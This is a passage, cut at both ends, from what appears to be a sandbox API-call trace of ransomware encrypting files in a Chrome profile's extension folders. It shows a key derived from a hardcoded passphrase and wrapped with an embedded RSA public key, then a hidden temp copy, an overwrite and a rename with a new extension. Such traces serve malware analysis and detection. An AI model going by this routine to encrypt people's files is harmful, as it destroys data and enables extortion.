[0255.908] GetFileType (hFile=0x5d64) returned 0x1 [0255.908] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0255.910] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0255.910] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e186a8 [0255.910] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.910] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.910] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0255.910] GetLastError () returned 0x0 [0255.910] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json")) returned 0x20 [0255.911] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x80) returned 1 [0255.911] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.912] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.284] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.gsg", dwFileAttributes=0x2) returned 1 [0256.285] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e172e8) returned 1 [0256.287] CryptCreateHash (in: hProv=0x2e172e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0256.287] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.287] CryptHashData (hHash=0x2e18828, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.287] CryptDeriveKey (in: hProv=0x2e172e8, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e18128) returned 1 [0256.287] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.287] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0256.287] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e176a0) returned 1 [0256.288] CryptImportPublicKeyInfo (in: hCryptProv=0x2e176a0, dwCertEncodingType=0x1, pInfo=0x2e29c90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29cc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29cc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e182e8) returned 1 [0256.288] CryptEncrypt (in: hKey=0x2e182e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0256.288] CryptEncrypt (in: hKey=0x2e182e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e166b0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e166b0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0256.288] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e166b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e166b0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0256.290] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.308] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.308] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.309] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.309] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.309] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.310] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.310] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.310] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.310] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x73, lpOverlapped=0x0) returned 1 [0256.310] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x73, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x80) returned 1 [0256.310] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0256.310] CloseHandle (hObject=0x5d50) returned 1 [0256.310] CloseHandle (hObject=0x5d5c) returned 1 [0256.310] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), bFailIfExists=0) returned 1 [0256.313] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x0) returned 1 [0256.314] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.gsg")) returned 1 [0256.315] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.fuck")) returned 1 [0256.316] CryptDestroyHash (hHash=0x2e18828) returned 1 [0256.316] CryptDestroyKey (hKey=0x2e18128) returned 1 [0256.316] CryptReleaseContext (hProv=0x2e172e8, dwFlags=0x0) returned 1 [0256.316] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.316] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0256.316] GetLastError () returned 0x0 [0256.317] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json")) returned 0x20 [0256.317] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0256.317] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.318] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.319] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0256.319] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e172e8) returned 1 [0256.321] CryptCreateHash (in: hProv=0x2e172e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0256.322] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.322] CryptHashData (hHash=0x2e18828, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.322] CryptDeriveKey (in: hProv=0x2e172e8, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e18128) returned 1 [0256.322] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.322] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0256.322] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e12778) returned 1 [0256.322] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12778, dwCertEncodingType=0x1, pInfo=0x2e29d60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29d90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29d98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e193e8) returned 1 [0256.322] CryptEncrypt (in: hKey=0x2e193e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0256.322] CryptEncrypt (in: hKey=0x2e193e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12800*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e12800*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0256.323] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e12800*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e12800*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0256.324] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.338] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.338] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.340] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.340] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.340] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.340] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.340] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.340] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.341] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.341] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.341] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.341] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.341] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.341] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.341] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.341] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.341] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.341] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.341] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.341] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.341] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.342] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.342] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.342] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.342] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.342] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.342] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.342] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.342] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.342] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.342] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.342] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.342] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: 